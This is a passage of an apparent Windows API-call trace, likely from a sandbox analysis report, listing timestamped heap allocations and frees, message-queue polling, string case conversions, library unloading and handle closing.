returned 0x24b18b8 [0195.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0195.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0195.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0195.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0195.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0195.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0195.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0195.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0195.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0195.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0195.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0195.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0195.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0195.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0195.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0195.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0195.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0195.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0195.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0195.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0195.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0195.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0195.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0195.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0195.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0195.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0195.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0195.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0195.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0195.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0195.998] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0195.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0195.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0195.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0195.998] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0195.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0195.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0195.999] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0195.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0195.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0195.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0195.999] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0195.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0195.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0196.000] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0196.000] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0196.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0196.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0196.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0196.000] FreeLibrary (hLibModule=0x74d40000) returned 1 [0196.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0196.001] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0196.001] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0196.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.001] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0196.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0196.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0196.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0196.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0196.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0196.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0196.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0196.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0196.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa170 [0196.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0196.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0196.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0196.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0196.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0196.002] CloseHandle (hObject=0x294) returned 1 [0196.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0196.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0196.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0196.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0196.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0196.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0196.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0196.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0196.003] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0196.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0196.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0196.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0196.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0196.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0196.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa170 [0196.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0196.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0196.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0196.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0196.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0196.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0196.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.005] CloseHandle (hObject=0x268) returned 1 [0196.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0196.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0196.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0196.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0196.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0196.007] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0196.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0196.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0196.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0196.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0196.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0196.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0196.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0196.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0196.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, 